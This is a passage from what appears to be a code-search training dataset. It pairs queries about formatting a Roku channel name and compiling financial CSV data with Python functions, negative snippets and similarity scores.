Article')\n .exclude(tags__text__in=exclude)\n .annotate(recent=Max('issue__issue_date'))\n .order_by('-recent')[:5 - len(articles)]])\n \"\"\"\n Enable this code (and disable the above) for sponsored articles returning\n by date (without the tag preferences)\n\n articles.extend([c.child\n for c in Content.objects\n .filter(tags__text='Sponsored Article')\n .annotate(recent=Max('issue__issue_date'))\n .order_by('-recent')[:5 - len(articles)]])\n \"\"\"\n\n return {'articles': articles}", "def view_latest_post(request):\n address = request.POST.get('address')\n rpc_raw = rpcRawProxy(helpers.get_rpc_url())\n\n latest_blog_post = Blog.objects.filter(address_from=address).order_by('-time')[0]\n\n blog_post = helpers.download_blg(rpc_raw, latest_blog_post.key, latest_blog_post.address_from)\n\n return HttpResponse(json.dumps({\n \"status\": \"success\",\n \"data\": blog_post\n }, default=helpers.json_custom_parser), content_type='application/json')" ]
[ "0.6630519", "0.6064325", "0.5982739", "0.5916848", "0.58361304", "0.5788325", "0.57815117", "0.5755909", "0.57152796", "0.56332666", "0.56171244", "0.5601291", "0.5582968", "0.54634035", "0.5452473", "0.53599924", "0.5354808", "0.5313329", "0.52591276", "0.522024", "0.5218829", "0.5195488", "0.51946217", "0.5189172", "0.51653963", "0.5148892", "0.5133105", "0.5123282", "0.5082277", "0.5056665", "0.5044052", "0.5043295", "0.5042931", "0.5018061", "0.5010417", "0.50023115", "0.49916583", "0.4972063", "0.49703163", "0.4968735", "0.49667653", "0.4964661", "0.49483493", "0.49469092", "0.49449593", "0.4939857", "0.49372822", "0.49285167", "0.49092993", "0.4891158", "0.48835546", "0.48812398", "0.48722607", "0.48692045", "0.4862355", "0.48576754", "0.48517412", "0.48446405", "0.48441094", "0.48408416", "0.48406458", "0.48387554", "0.48325053", "0.4825628", "0.48149976", "0.48141906", "0.4813046", "0.47965688", "0.4795931", "0.47908202", "0.4780503", "0.4774762", "0.4772929", "0.4762851", "0.47584668", "0.475171", "0.47481477", "0.47445083", "0.47357628", "0.47331628", "0.4722749", "0.47210196", "0.47066376", "0.46915907", "0.46819752", "0.46780473", "0.4673064", "0.46718848", "0.4665418", "0.46630424", "0.4658545", "0.46453267", "0.46450746", "0.46450746", "0.46435866", "0.4640652", "0.46328145", "0.46303347", "0.46271017", "0.4625891" ]
0.67686737
0
Format a Roku Channel name.
def format_channel_name(channel_number: str, channel_name: str | None = None) -> str: if channel_name is not None and channel_name != "": return f"{channel_name} ({channel_number})" return channel_number
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def channel_name(radio_id: int, channel_id: int) -> str:\n return f\"COMM{radio_id} Ch {channel_id}\"", "def channelName(self):\n channel_list = (\"Neutral\",\n \"BBC1\",\n \"BBC2\",\n \"ITV\",\n \"Channel 4\",\n \"Channel 5\")\n channel_name = channel_list[self.channel]\n return channel_name", "def channel_name(self) -> str:\n return self._channel_name", "def channel_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"channel_name\")", "def channel_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"channel_name\")", "def channel_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"channel_name\")", "def channel_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"channel_name\")", "def channel_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"channel_name\")", "def channel_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"channel_name\")", "def channel_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"channel_name\")", "def channel_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"channel_name\")", "def channel_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"channel_name\")", "def channel_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"channel_name\")", "def channel_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"channel_name\")", "def channel_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"channel_name\")", "def channel_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"channel_name\")", "def channel_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"channel_name\")", "def channel_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"channel_name\")", "def channel_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"channel_name\")", "def channel_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"channel_name\")", "def channel_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"channel_name\")", "def channel_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"channel_name\")", "def fmt(competitor_name: str) -> str:\n name = competitor_name.replace(\"_a\", r\" $\\alpha$ \")\n name = name.replace(\"_b\", r\" $\\beta$ \")\n return name", "def channel_string(self, pre=\"\", full=False):\n\n return \" \".join(pre+c.get_chanstr(full=full) for c in self.channels)", "def get_channel_name(self, channelid, isdm=False):\n\n if isdm:\n return channelid\n\n request = SimpleRequest(self.headers).request\n channel = request.grab_page('https://discordapp.com/api/%s/channels/%s' % (self.api, channelid))\n\n if channel is not None and len(channel) > 0:\n return '%s_%s' % (channelid, self.safe_name(channel['name']))\n\n else:\n error('Unable to fetch channel name from id, generating one instead.')\n return '%s_%s' % (channelid, random_str(12))", "def delivery_channel_name(self) -> str:\n return pulumi.get(self, \"delivery_channel_name\")", "def delivery_channel_name(self) -> str:\n return pulumi.get(self, \"delivery_channel_name\")", "def delivery_channel_name(self) -> str:\n return pulumi.get(self, \"delivery_channel_name\")", "def button_string(channel, red, blue):\n return 'CH{:s}_{:s}_{:s}'.format(channel, red, blue)", "def char_name(character_object, verbose_where=False, watch_list=None):\n watch_list = watch_list or []\n cname = character_object.name\n if character_object in watch_list:\n cname += \"{c*{n\"\n if character_object.player_ob and character_object.player_ob.db.lookingforrp:\n cname += \"|R+|n\"\n if not verbose_where:\n return cname\n if character_object.db.room_title:\n cname += \"{w(%s){n\" % character_object.db.room_title\n return cname", "def to_release_brach_name(self) -> str:\n return f\"release/{self.major}.{self.minor}\"", "def format_name(self) -> str:\n return self.name", "def channel_link(self, obj):\n if obj.channel is None:\n return '\\N{EM DASH}'\n\n return format_html(\n '<a href=\"{}\">{}</a>',\n reverse('admin:mediaplatform_channel_change', args=(obj.channel.pk,)),\n obj.channel.title if obj.channel.title != '' else '[Untitled]'\n )", "def to_str(self) -> str:\n perms = (\n \"Write and Read\"\n if self.perms == \"wr\"\n else \"Read\"\n if self.perms == \"r\"\n else \"Write\"\n )\n return f\"Channel: <#{self.channelID}>\\n┗━▷ Linked to **{self.wh}** - Permissions: *{perms}*\"", "def channel_name(self, channel_name):\n self.channel_id = self.get_channel_id(channel_name)\n LOG.debug(\"Mattermost channel id: %s\", self.channel_id)", "def format_name(field_name):\r\n if field_name == \"celebration_tier\":\r\n return \"{wLargesse{n\"\r\n return \"{w%s{n\" % field_name.capitalize()", "def create_ticker_channel(self, symbol: str) -> str:", "def parse_channel(self, channel):\n return channel.split(\":\")[1:]", "async def text_channel_name_length(\n channel: Channel\n):\n return len(channel.name)", "def get_video_channel_name(self, response):\n return response.css(\"div.yt-user-info\")\\\n .extract_first(default='')", "def __str__(self: GtinFormat) -> str:\n return self.name.replace(\"_\", \"-\")", "def format_pname(player, lname=False, sparse=False):\n base = player.name.capitalize()\n if lname and not sparse:\n char = player.char_ob\n if char:\n base = char.item_data.longname or base\n if player.db.afk:\n base += \" {w(AFK){n\"\n if player.db.lookingforrp:\n base += \" {w(LRP){n\"\n if player.is_staff:\n base += \" {c(Staff){n\"\n return base", "def test_unicode_channel_name(self):\n channel_layer.send(\"\\u00a3_test\", {\"value\": \"blue\"})\n # Get just one first\n channel, message = channel_layer.receive_many([\"\\u00a3_test\"])\n self.assertEqual(channel, \"\\u00a3_test\")\n self.assertEqual(message, {\"value\": \"blue\"})", "def build_track_name(track, number = ''):\n\n name = ''\n if number:\n name += number\n name += ' - '\n name += track\n return name", "def print_name(self, name):\r\n for e in self.channels:\r\n if e.name == name:\r\n e.print()", "def __find_notification_channel_name_in_message(message):\n channel_name = [t for t in message.split() if t.startswith('[projects')]\n return channel_name[0].translate(None, '[].')", "def api_get_channel_name(channel_id, api_service):\n request = api_service.channels().list(id=channel_id, part='snippet')\n success = False\n\n response = None\n\n while not success:\n\n try:\n response = request.execute()\n success = True\n\n except ConnectionResetError:\n print(\"ConnectionResetError: let me sleep for 5 seconds, just enough time to recover...\")\n sleep(5)\n\n name = response['items'][0]['snippet']['title']\n\n return name", "def create_tickers_channel(self) -> str:", "def _get_name(self):\n return '%s: %s-%s' % (\n self.fcs_number,\n self.parameter_type,\n self.parameter_value_type)", "def create_book_ticker_channel(self, symbol: str) -> str:", "async def get_project_channel_name(self, workspace: WorkspaceEntity):\n await self.client.login(os.environ['DISCORD_BOT_TOKEN'], bot=self.is_bot)\n channel_name = \"\"\n try:\n channel = await self.get_channel(workspace.project_channel_id)\n except HTTPException as error:\n # project channel id may result in Missing Access (code 50001)\n self.logger.critical(\n f\"discord {self.get_project_channel_name.__name__} request failed for workspace {workspace.id} and raised error: {error.text} (code {error.code})\")\n else:\n channel_name = channel.name\n\n await self.client.logout()\n return channel_name", "def create_book_tickers_channel(self) -> str:", "def cc(self, name):\n return \"\".join([n[0].upper() + n[1:] for n in name.split(\".\")])", "def set_channel(self, channel):\n self.l1.setText(\"Channel: \" + str(channel))", "def __str__(self):\n return 'Channel: {{{}}} --> {{{}}} | {} ... '.format(\n ', '.join(sorted([str(i.indi) for i in self.ist])) if self.ist else '-', \n ', '.join(sorted([str(o.indo) for o in self.ost])) if self.ost else '-', \n 'running' if self._running else 'stopped')", "async def name(self, ctx, *, name: str):\n await self.config.guild(ctx.guild).name.set(name)\n await ctx.send(\n _(\"Automatically created voicechannels will now be named ``{name}``.\").format(\n name=name\n )\n )", "def channel(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"channel\")", "def getHubName(num):\n baseNum = num % 1000\n if baseNum > 0 and baseNum < 100:\n return \"%02d\" % baseNum\n if baseNum > 200 and baseNum < 220:\n return \"%02dt\" % (baseNum - 200)\n return \"?%d?\" % baseNum", "def _group_name(cls, group=None):\n suffix = f\"{cls.__module__}.{cls.__qualname__}\"\n if group is not None:\n suffix += \"-\" + group\n\n # Wrap the suffix into SHA256 to guarantee that the length of\n # the group name is limited. Otherwise Channels will complain\n # about that the group name is wrong (actually is too long).\n suffix_sha256 = hashlib.sha256()\n suffix_sha256.update(suffix.encode(\"utf-8\"))\n\n return f\"{GraphqlWsConsumer.group_name_prefix}-{suffix_sha256.hexdigest()}\"", "def is_channel_name(name):\n return name.startswith('#') or name.startswith('&')", "def _deepvariant_channel_names(num_channels):\n # Add additional empty labels if there are more channels than expected.\n filler_labels = [\n 'channel {}'.format(i + 1)\n for i in range(len(DEEPVARIANT_CHANNEL_NAMES), num_channels)\n ]\n labels = DEEPVARIANT_CHANNEL_NAMES + filler_labels\n # Trim off any extra labels.\n return labels[0:num_channels]", "def format_color_name(string, frame_name):\n if frame_name == \"primary\":\n color = \"red\"\n else:\n color = \"green\"\n return format_color(string, color)", "async def voice_channel_name_length(\n channel: P('channel', 'Select a voice channel', channel_types = [ChannelType.guild_voice])\n):\n return len(channel.name)", "def name(self):\n return '#{}'.format(self.number)", "def generate_name(self, name):\n return \"{}/{}.{}\".format(self.name, self._layer_counter, name)", "def name(self):\n # self._name = \"wyzeapi_\"+self._device_mac+\"_\"+ self._name\n return self._device.nickname", "def name(self):\n name = self.__telegram_info.message.from_user.name\n return name[0].upper() + name[1::]", "def format_colname(name):\n colnames = [\n \"AV\",\n \"RV\",\n \"EBV\",\n \"CAV1\",\n \"CAV2\",\n \"CAV3\",\n \"CAV4\",\n \"C1\",\n \"C2\",\n \"C3\",\n \"C4\",\n \"x_o\",\n \"gamma\",\n \"bump_area\",\n \"fh2\",\n \"nhtot\",\n \"nh2\",\n \"nhi\",\n \"NH_AV\",\n \"NH_EBV\",\n ]\n plotnames = [\n \"$A(V)$\",\n \"$R(V)$\",\n \"$E(B-V)$\",\n \"$C^{A(V)}_1$\",\n \"$C^{A(V)}_2$\",\n \"$C^{A(V)}_3$\",\n \"$C^{A(V)}_4$\",\n \"$C_1$\",\n \"$C_2$\",\n \"$C_3$\",\n \"$C_4$\",\n \"$x_o$\",\n r\"$\\gamma$\",\n r\"$\\pi C^{A(V)}_3 / 2 \\gamma$\",\n \"$f(H_2)$\",\n \"$N(H)$\",\n \"$N(H_2)$\",\n \"$N(HI)$\",\n \"$N(H)/A(V)$\",\n \"$N(H)/E(B-V)$\",\n ]\n dic_pairs = dict(zip(colnames, plotnames))\n\n out_name = name\n if name[:3] == \"log\":\n out_name = r\"$\\log (\" + name[3:].upper() + \")$\"\n elif name in dic_pairs.keys():\n out_name = dic_pairs[name]\n\n return out_name", "def get_name(self) -> str:\n return self.message[42:74].decode().rstrip(\"\\x00\")", "def channel_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"channel_id\")", "def _name (self, incAggr = True):\n\t\taggrName = \"@%s\" % self.aggr if self.aggr and incAggr else \"\"\n\t\ttag = \".%s\" % self.tag if self.tag != \"notag\" else \"\"\n\t\treturn \"%s%s%s\" % (self.id, tag, aggrName)", "def create_mini_ticker_channel(self, symbol: str) -> str:", "def in_battle_name(self):\n if self.trainer:\n return u\"{0}'s {1}\".format(self.trainer.name, self.nickname)\n else:\n return u\"Wild {0}\".format(self.nickname)", "def format_category_name(category):\n\n category_words = category.name.rstrip().replace(',', '').replace(\"'\", '').split(\" \")\n return \"-\".join(category_words)", "def get_name() -> str:", "async def test_get_rpc_channel_name(mock_rpc_device) -> None:\n assert get_rpc_channel_name(mock_rpc_device, \"input:0\") == \"test switch_0\"\n assert get_rpc_channel_name(mock_rpc_device, \"input:3\") == \"Test name switch_3\"", "def printname(bruce):", "def format_jira(jid: str) -> str:\n jid = jid.lower().strip()\n jid = jid.split('_')[0]\n j = \"\".join(jid.split('-'))\n return j", "def rename_channels(self, new_names):\n if \"time\" in new_names:\n del new_names[new_names.index(\"time\")]\n\n new_names = [\n \"time\",\n ] + new_names\n\n self.ch_name = has_size(\n is_valid(new_names, list, list_type=str), self.ch_amount, \"unknown\"\n )", "def generate_file_name(well, channel, desc):\n \n return \"bPLATE_w\" + well + \"_\" + desc + \"_c\" + channel + \".png\"", "def default_name(self):\n name = f\"Player {self.UID.split('-')[0]}\"\n return name", "def generate_colorbar_label(standard_name, units):\n return str(standard_name).replace(\"_\", \" \") + \" (\" + units + \")\"", "async def ticket_name(self, ctx, *, name: str):\n guild_settings = await self.config.guild(ctx.guild).all()\n is_admin = await is_admin_or_superior(self.bot, ctx.author) or any(\n [ur.id in guild_settings[\"supportroles\"] for ur in ctx.author.roles]\n )\n must_be_admin = not guild_settings[\"usercanname\"]\n\n if not is_admin and must_be_admin:\n await ctx.send(\"Only Administrators can rename tickets.\")\n return\n elif not is_admin:\n author = ctx.author\n author_id = author.id\n elif is_admin:\n # Since the author isn't specified, and it's an admin, we need to guess on who\n # the author is\n inverted = {}\n for author_id, tickets in guild_settings[\"created\"].items():\n for ticket in tickets:\n inverted[ticket[\"channel\"]] = author_id\n try:\n author = ctx.guild.get_member(int(inverted[ctx.channel.id]))\n if author:\n author_id = author.id\n else:\n author_id = int(inverted[ctx.channel.id])\n except KeyError:\n author = ctx.author\n author_id = author.id\n\n if str(author_id) not in guild_settings[\"created\"]:\n await ctx.send(\"You don't have any open tickets.\")\n return\n\n index = None\n\n if not guild_settings[\"created\"][str(author_id)]:\n await ctx.send(\"You don't have any open tickets.\")\n return\n elif len(guild_settings[\"created\"][str(author_id)]) == 1:\n index = 0\n else:\n for i, ticket in enumerate(guild_settings[\"created\"][str(author_id)]):\n if ticket[\"channel\"] == ctx.channel.id:\n index = i\n break\n\n if index is None:\n await ctx.send(\n \"You have multiple tickets open. \"\n \"Please run this command in the ticket channel you wish to edit.\"\n )\n return\n\n channel = self.bot.get_channel(guild_settings[\"created\"][str(author_id)][index][\"channel\"])\n if not channel:\n await ctx.send(\"The ticket channel has been deleted.\")\n return\n\n if len(name) > 99:\n await ctx.send(\"Channel names must be less 100 characters\")\n return\n\n try:\n await channel.edit(name=name)\n except discord.Forbidden:\n await ctx.send(\n \"The Manage Channels channel for me has been removed. \"\n \"I am unable to modify this ticket.\"\n )\n return\n\n await ctx.send(\"The ticket has been renamed.\")", "def get_nomenclature_channel_fname(czi_fname, nomenclature_file, channel_name, ext='.inr.gz'):\n # - Read NOMENCLATURE file defining naming conventions:\n n_names = get_nomenclature_name(nomenclature_file)\n return n_names[czi_fname]+\"/\", n_names[czi_fname] + \"_\" + channel_name + ext", "def name(self):\n return f\"{self._group.friendly_name} {GROUP_SUFFIX}\"", "def channel_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"channel_id\")", "def channel_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"channel_id\")", "def channel_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"channel_id\")", "def channel_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"channel_id\")", "def format_name(self) -> str:\n decl = self.declaration\n name, _ = decl.split(\"(\", 1)\n return name", "def deleteChannel(channelName):\n renameTo = ''.join([char if char.isnumeric() else '_' for char in str(datetime.utcnow())])\n renameChannel(channelName, renameTo)\n\n post(f\"https://slack.com/api/conversations.archive?{parse.urlencode({'channel' : channelNameToID(renameTo)})}\", headers=slackHeader(current_user.slackUserToken))\n return \"Zulip deleted a Slack channel\"", "def setChannelNames(self, n1, n2):\n\t\tfor i, val in enumerate(self.headervals):\n\t\t\ts = val[0]\n\t\t\ts = s.replace(\"%ch1%\", n1)\n\t\t\ts = s.replace(\"%ch2%\", n2)\n\t\t\tself.headervals[i][0] = s\n\t\t\tself.SetStringItem(i, 0, s)", "def get_rep_name(self, name):\n return \"r{0}\".format(name)", "def format_name(self) -> str:\n decl = self.declaration\n name, _, _ = decl.partition(\"(\")\n return name", "def print_name(name):\r\n\r\n\r\n return name + \"-apple\"", "def channelURL(self):\n bytes = self.radioConfig.channel_settings.SerializeToString()\n s = base64.urlsafe_b64encode(bytes).decode('ascii')\n return f\"https://www.meshtastic.org/c/#{s}\"", "def create_mini_tickers_channel(self) -> str:", "def names(self, channel, *args, **kwargs):\n pass", "def channels(message):\n for channel in message._client.channels:\n if 'is_member' in channel:\n message.reply(\"{} ({})\".format(channel['name'], channel['id']))\n elif 'is_im' in channel:\n #print(channel)\n friendlyname = channel['user']\n try:\n friendlyname = channel['user'][\"name\"]\n except (KeyError, AttributeError):\n pass\n message.reply(\"User channel: {} ({})\".format(friendlyname,\n channel['id']))" ]
[ "0.78294134", "0.7059564", "0.6983384", "0.68293834", "0.68293834", "0.68293834", "0.68293834", "0.68293834", "0.68293834", "0.68293834", "0.68293834", "0.68293834", "0.68293834", "0.68293834", "0.68293834", "0.68293834", "0.68293834", "0.68293834", "0.68293834", "0.68293834", "0.68293834", "0.68293834", "0.6251904", "0.623915", "0.6203214", "0.6163108", "0.6163108", "0.6163108", "0.6115342", "0.6044168", "0.5996663", "0.59861684", "0.5982424", "0.58881533", "0.5855659", "0.5841114", "0.5824856", "0.58043706", "0.58042604", "0.5739522", "0.5735299", "0.5732716", "0.5665129", "0.56581974", "0.5645676", "0.5636061", "0.56256175", "0.55910647", "0.55887824", "0.55788994", "0.5537991", "0.5523505", "0.5518829", "0.5516172", "0.54946554", "0.54695374", "0.5448508", "0.54452544", "0.5419127", "0.5380338", "0.5359679", "0.5353301", "0.5352421", "0.5347443", "0.5343747", "0.5334382", "0.53334373", "0.5322641", "0.5317655", "0.5300268", "0.5289551", "0.52764565", "0.52763665", "0.52761406", "0.5275519", "0.52724683", "0.5268438", "0.5266369", "0.5263986", "0.52626365", "0.5258036", "0.52575725", "0.52485085", "0.52429485", "0.5242068", "0.52401197", "0.52401197", "0.52401197", "0.52401197", "0.5236843", "0.5232151", "0.52321196", "0.52241206", "0.5222309", "0.5221734", "0.5203344", "0.5200386", "0.51982325", "0.5196665" ]
0.7868498
1
Input filepath of financial data csv dump compile all the information into one dataframe return dataframe containing Adjusted price values of each security listed in directory
def compile_index_data(data_filepath,index_name): # find existing .pickle file filename = [_ for _ in glob.glob('*.pickle') if index_name in _ ][0].split('.')[0] + '_adj_close.csv' # with open(pickle_list[0],'rb') as f: # tickers = pickle.load(f) tickers = os.listdir(data_filepath) os.chdir(data_filepath) # retrieve list of csv files in given filepath main_df = pd.DataFrame() # create empty dataframe if filename in tickers: print ('{} already exists'.format(filename)) else: for count, ticker in enumerate(tickers): try: # using enumerate to loop through all the tickers # and keep track of the number of tickers df = pd.read_csv(ticker) # import csv into dataframe df.set_index('Date',inplace=True) # set Date column as index column, # inplace set to True so that its not redefined it everytime # is done in place. t_name = ticker.split('.')[0] df.rename(columns = {'Adj Close': t_name}, inplace=True) # since the only values we need for analysis is the adjusted close value # we rename column name to ticker symbol # df_adj_col_ticker = df[ticker].to_frame() if main_df.empty: main_df = df[t_name].to_frame() # convert series into dataframe else: main_df = main_df.join(df[t_name].to_frame(), how='outer') # Track progress of compiling if count % 10 == 0: print ('Percent complete: {}'.format(round(count/500*100))) except Exception as e: print ('Failed to compile {} due to: '.format(t_name) + str(e)) pass # convert dataframe to csv print ('Compiling data into {}'.format(filename)) main_df.to_csv(filename) return filename
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def extract_df(self, file_path):\n df = pd.read_csv(file_path, sep=\";\")\n df.rename(columns={\"Get\": \"Currency\"}, inplace=True)\n df = df[df[\"Pay\"] == \"Chaos Orb\"]\n df = df[[\"League\", \"Date\", \"Currency\", \"Value\"]]\n df[\"Date\"] = pd.to_datetime(df[\"Date\"])\n df[\"Date\"] = df[\"Date\"] - df.loc[0][\"Date\"]\n return df", "def load_extract(cryptocurrency):\n df = pd.read_csv(f'input_12mo/{cryptocurrency}.csv')\n df = df['Close'].copy()\n df = df[-183:].copy()\n return df", "def get_data(self, df, latest_currency):\n file_paths = list(df[\"File\"])\n df = self.extract_df(file_paths[0])\n df = self.group_df(df)\n df = self.fill_league_currency(df, latest_currency)\n for file_path in file_paths[1:]:\n league = self.extract_df(file_path)\n league_grp = self.group_df(league)\n league_grp = self.fill_league_currency(league_grp, latest_currency)\n df = df.join(league_grp)\n df = df.reset_index(drop=True)\n return df", "def GetRateData(directory):\n\n rt_data = pd.read_csv(directory)\n return rt_data", "def loan_data():\n return pd.read_csv(data_path / \"credit_data.csv\")", "def get_sp500_stocks_file(file_path=None):\n\n df = pd.read_csv(file_path)\n\n return df", "def read_ticker(\n ticker:str) -> pd.DataFrame:\n df = pd.read_csv(f'../data/consolidate/{ticker}.csv',\n index_col='Unnamed: 0',parse_dates=True).fillna(0)\n\n df = df.loc[:, (df != 0).any(axis=0)] # removing 0 columns\n df = df.pct_change().replace([np.inf, -np.inf, np.nan], 0)\n\n return df", "def import_data():\n current_share_prices = pd.read_csv(join('resources', 'share_prices.csv'))\n current_share_prices = current_share_prices.set_index(['Date'])\n current_share_prices.index = pd.to_datetime(current_share_prices.index, format='%m/%d/%Y', infer_datetime_format=True)\n\n contrib = pd.read_csv(join('resources', 'contributions.csv'))\n contrib = contrib.set_index(['Date'])\n contrib.index = pd.to_datetime(contrib.index, format='%m/%d/%Y', infer_datetime_format=True)\n contribs_dollars = contrib[['Traditional', 'Roth', 'Automatic_1', 'Matching', 'Total']]\n contribs_shares = contrib.drop(columns=['Traditional', 'Roth', 'Automatic_1', 'Matching', 'Total'])\n concat = pd.concat([current_share_prices, contribs_shares])\n\n current_shares = []\n for account in contribs_shares:\n current_shares.append(sum(contribs_shares[account]))\n current_shares = np.array(current_shares)\n current_dollars = current_shares * current_share_prices.iloc[0]\n balance_dollars = sum(current_dollars)\n current_distribution = current_dollars / balance_dollars\n\n return current_share_prices, contribs_dollars, contribs_shares, current_shares, current_dollars, balance_dollars", "def load_predict(cryptocurrency):\n df = pd.read_csv(f'output_12mo/{cryptocurrency}.csv')\n #df = df.drop(0, axis=0).copy()\n #df = df['Close'].copy()\n #df = df[:-25].copy()\n return df", "def prepare_data(filename='data/DOT_timeSeries.csv'):\n\n # read data file into pandas dataframe\n df = pd.read_csv(filename)\n\n # extract unwanted 'countries' from dataframe\n countries = ['Europe', 'Emerging and Developing Europe', 'Emerging and Developing Asia',\n 'Middle East, North Africa, and Pakistan', 'Export earnings: nonfuel',\n 'Sub-Saharan Africa', 'Export earnings: fuel', 'Western Hemisphere',\n 'World', 'Special Categories', 'Advanced Economies', 'CIS',\n 'Emerging and Developing Economies']\n for country in countries:\n df = extract_relevant_rows(df, column_name='Country Name', column_value=country, not_equal=True)\n df = extract_relevant_rows(df, column_name='Counterpart Country Name', column_value=country, not_equal=True)\n\n # extract exports only from data\n exports = extract_relevant_rows(df, column_name='Indicator Code', column_value='TXG_FOB_USD')\n # extract value attributes only from exports\n export_values = extract_relevant_rows(exports, column_name='Attribute', column_value='Value')\n\n return export_values", "def import_prices(self):\n temp = dict(self.currencies_and_regions)\n for index, row in self.df.iterrows():\n self.set_mini_bundle_name(row[\"Journal Name \"])\n self.set_issns(row[\"ISSN\"])\n self.set_currency(row[\"Currency\"])\n if not self.currency:\n continue\n cur = self.get_raw_currency(row[\"Currency\"])\n region = temp[cur]\n self.set_region(region)\n self.set_country(region)\n self.set_price(row[\"2021 rate\"])\n self.add_prices()\n\n # reset for next loop\n self.issns = []\n db.session.commit()", "def import_prices(self):\n temp = dict(self.currencies_and_regions)\n for index, row in self.df.iterrows():\n self.set_journal_name(row[\"Journal Name \"])\n self.set_issn(row[\"ISSN\"])\n self.set_journal()\n self.set_currency(row[\"Currency\"])\n if not self.currency:\n continue\n cur = self.get_raw_currency(row[\"Currency\"])\n region = temp[cur]\n self.set_region(region)\n self.set_country(region)\n self.process_fte(row[\"Price Group\"])\n self.set_price(row[\"2021 rate\"])\n self.add_price_to_db()\n\n db.session.commit()", "def process_fx_file(path):\n data = pd.read_csv(path, delimiter=';', decimal=',', parse_dates=[\"Date\"], date_parser=fx_dateparse)\n data.to_csv(path.split(\".\")[0] + \"_pr.\" + path.split(\".\")[1], float_format='%.6f', index=False)\n \n return data", "def _get_liwc_df(self) -> pd.DataFrame:\n data = pd.read_csv(self.path)\n data.index = pd.to_numeric(data['Filename'].str.rstrip('.txt'))\n return data", "def process_csv(filepath):\n suburb = get_suburb(filepath)\n read_file = pd.read_csv(filepath,\n infer_datetime_format=True,\n parse_dates=[\"SALE DATE\"],\n dayfirst=True)\n read_file[\"SUBURB\"] = suburb\n separate_date(read_file)\n return read_file", "def get_data(filename):\n\n # Read csv file as panda dataframe\n data = pd.read_csv(filename)\n data.columns = ['Date', 'Open', 'High', 'Low', 'Close', 'Volume', 'MarketCap']\n\n # Adjast frames\n data['Date'] = pd.to_datetime(data['Date'])\n data['Average'] = data.eval('Open + Close') / 2\n \n # Adjust diff column\n data['Diff'] = data['Average'] - data['Average'].shift(1)\n \n # Return data as lists\n return data['Date'].tolist()[1:], data['Average'].tolist()[1:], data['Diff'].tolist()[1:]", "def mergeDatabase(df):\n\n\tabsPath = os.path.abspath(__file__)\n\tabsPath = os.path.split(absPath)[0]\n\tabsPath = ''\n\n\tdataPath = os.path.join(absPath, 'dual-data')\n\n\tdfFinal = None\n\n\t# 20210122__0002_lcrPicker has high-freq ap, no lcr b/w spikes\n\trejectionList = ['dual-data/20210122/20210122__0002_lcrPicker.csv']\n\n\tprint('dataPath:', dataPath)\n\tnumFiles = 0\n\tfor obj in os.listdir(dataPath):\n\t\tfolderPath = os.path.join(dataPath, obj)\n\t\tif os.path.isdir(folderPath):\n\t\t\tprint('folderPath:', folderPath)\n\t\t\tfor file in os.listdir(folderPath):\n\t\t\t\tif file.startswith('.'):\n\t\t\t\t\tcontinue\n\t\t\t\tif file.endswith('_lcrPicker.csv'):\n\t\t\t\t\tcsvPath = os.path.join(folderPath, file)\n\t\t\t\t\tprint(' csvPath:', csvPath)\n\n\t\t\t\t\tif csvPath in rejectionList:\n\t\t\t\t\t\tprint('!!! rejecting csvPath:', csvPath)\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tnumFiles += 1\n\t\t\t\t\tif dfFinal is None:\n\t\t\t\t\t\tdfFinal = pd.read_csv(csvPath, header=0)\n\t\t\t\t\telse:\n\t\t\t\t\t\tdf0 = pd.read_csv(csvPath, header=0)\n\t\t\t\t\t\tdfFinal = dfFinal.append(df0)\n\t\t\t\t\t\tdfFinal.reset_index(drop=True)\n\t\t\t\t\t\t# todo: should be\n\t\t\t\t\t\t#dfFinal = dfFinal.reset_index(drop=True)\n\n\t#\n\t# add new column for time of lcr before spike\n\t# todo: make new col to get rid of lcr where lcrPreSpikeSec < 0.1 sec\n\tif 1:\n\t\tdfFinal['lcrPreSpikeSec'] = dfFinal['spikeSec'] - dfFinal['lcrSec']\n\n\t\t#print(dfFinal[ np.isnan(dfFinal['lcrPreSpikeSec']) ] )\n\n\t\t# remove lcr (rows) that are close to before the spike, lcrPreSpikeSec<0.1\n\t\t# important: we need second or np.isnan() to KEEP lcrPicker with no spike detecct\n\t\tlcrNoCloserThanSec = 0.15\n\t\tprint('num lcr before removing lcr close to spike:', len(dfFinal))\n\t\tdfFinal = dfFinal[ (dfFinal['lcrPreSpikeSec'] > lcrNoCloserThanSec) | (np.isnan(dfFinal['lcrPreSpikeSec']) ) ]\n\t\tprint(' after removing lcr close to spike:', len(dfFinal))\n\n\t#\n\t# save merged ccsv\n\tmasterCsv = 'lcrPicker-db.csv'\n\tprint('mergeDatabase() merged:', numFiles, '...saving masterCsv:', masterCsv)\n\tdfFinal.to_csv(masterCsv)", "def loadSensitivity(tradeTbl, sensiTbl, filepath, vectorField):\n\n df = pd.read_csv(filepath)\n df[\"AsOfDate\"] = pd.to_datetime(df[\"AsOfDate\"]).dt.date\n df[vectorField] = 